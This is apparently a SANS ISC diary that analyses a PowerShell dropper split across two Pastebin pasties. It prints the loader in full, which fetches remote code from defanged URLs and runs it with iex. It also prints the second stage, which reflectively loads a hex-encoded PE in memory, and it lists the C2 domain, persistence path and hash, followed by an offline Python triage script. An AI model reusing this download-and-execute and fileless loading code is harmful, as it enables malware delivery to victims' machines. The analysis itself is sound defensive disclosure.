Divided Payload in Multiple Pasties
In politics, there is a strategy called "divide and conquer". The same applies to some pieces of malware that spread their malicious code across multiple sources. One of our readers shared a sample of PowerShell code found on Pastebin that applies exactly this technique. Thanks to him!
Here is the complete PowerShell command line (beautified for easier reading):
powershell.exe -command
$request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF');
$request.Method="Get";
$response = $request.GetResponse();
$requestStream = $response.GetResponseStream();
$readStream = New-Object System.IO.StreamReader $requestStream;
$data=$readStream.ReadToEnd();
$rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA');
$rrequest.Method="Get";
$rresponse = $rrequest.GetResponse();
$rrequestStream = $rresponse.GetResponseStream();
$rreadStream = New-Object System.IO.StreamReader $rrequestStream;
$ddata=$rreadStream.ReadToEnd();
iex($data+$ddata)
The code is pretty easy to understand: it grabs the content of two pasties from pastebin.com, concatenates them and executes the result through iex, an alias for Invoke-Expression. So we can expect these pasties to contain more PowerShell code.
Indeed, here is the content of the concatenated data:
function HexToBin([string]$s) {
    $return = @()
    for ($i = 0; $i -lt $s.Length ; $i += 2) {
        $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)
    }
    Write-Output $return
}
$Str = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000 [stuff deleted] 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000';
$Str = $Str.replace("0","0");
[byte[]]$Data = HexToBin($str);
$asm = [System.Reflection.Assembly]::Load($Data);
$asm.EntryPoint.invoke($null,$null);
write-host "Can you help me";
[void][System.Console]::ReadKey($true);
This piece of code decodes the hex-encoded $Str variable into $Data using the HexToBin() function and executes it. The beginning of the string, 0x4D 0x5A 0x90 ('MZ' followed by 0x90), indicates that it is a PE file. The way it is executed is interesting: it uses the System.Reflection.Assembly[1] class to load the assembly and run its entry point from memory rather than from a file on disk (fileless PowerShell).
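For triage, the HexToBin step can be reproduced offline without ever calling Assembly.Load: pull the hex literal out of the script, decode it, confirm it really is a PE by following e_lfanew to the 'PE\0\0' signature, and hash it. This is an added Python example, not code from the diary; the script and the tiny PE stub inside it are constructed stand-ins for the real pasties and payload.

```python
import hashlib
import re
import struct

def fake_pe_hex() -> str:
    # Constructed stand-in for the real hex blob: an 'MZ' header whose
    # e_lfanew field (offset 0x3C) points at a 'PE\0\0' signature at 0x40.
    stub = bytearray(b"MZ" + b"\x00" * 0x3A)
    stub += struct.pack("<I", 0x40)          # e_lfanew
    stub += b"PE\x00\x00" + b"\x00" * 20     # PE signature + zeroed COFF header
    return stub.hex().upper()

# Constructed script with the same shape as the concatenated pasties
# (HexToBin, hex literal in $Str, reflective Assembly.Load), minus the payload.
SAMPLE_SCRIPT = (
    "function HexToBin([string]$s) { <# as in the diary #> } "
    "$Str = '" + fake_pe_hex() + "'; $Str = $Str.replace(\"0\",\"0\"); "
    "[byte[]]$Data = HexToBin($str); "
    "$asm = [System.Reflection.Assembly]::Load($Data); "
    "$asm.EntryPoint.invoke($null,$null);"
)

# Pastebin wraps long lines, and the diary shows curly quotes, so accept both.
HEX_LITERAL = re.compile(r"\$Str\s*=\s*['\u2018\u2019]([0-9A-Fa-f\s]+)['\u2018\u2019]")

def extract_hex_literal(script: str) -> str:
    m = HEX_LITERAL.search(script)
    if not m:
        raise ValueError("no $Str hex literal found")
    return re.sub(r"\s+", "", m.group(1))

def hex_to_bin(s: str) -> bytes:
    # Offline equivalent of the sample's HexToBin (two hex digits per byte).
    if len(s) % 2:
        raise ValueError("odd-length hex string")
    return bytes.fromhex(s)

def looks_like_pe(data: bytes) -> bool:
    # The 4D 5A the diary points at is 'MZ'; confirm by following e_lfanew to 'PE\0\0'.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def carve_payload(script: str) -> dict:
    # Decode the embedded blob and return what a triage note needs, without running it.
    data = hex_to_bin(extract_hex_literal(script))
    return {"size": len(data), "is_pe": looks_like_pe(data),
            "sha256": hashlib.sha256(data).hexdigest()}
```

Running carve_payload() on the real pastie text yields the carved binary's size and SHA256, which can then be checked against VT or sandboxed separately.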
The PE sample has the following SHA256 hash: 30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6.exe. It was unknown on VT yesterday, but today it was uploaded from Denmark and has already reached a score of 24/63[2]. It adds persistence by creating a .lnk file in %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ that points to a copy of itself stored in %TEMP%. It tries to communicate with a C2 (testhoward[.]mysecondarydns[.]com) over HTTPS.
Happy Thanksgiving!
[1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly?view=netframework-4.7.2
[2] https://www.virustotal.com/#/file/30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant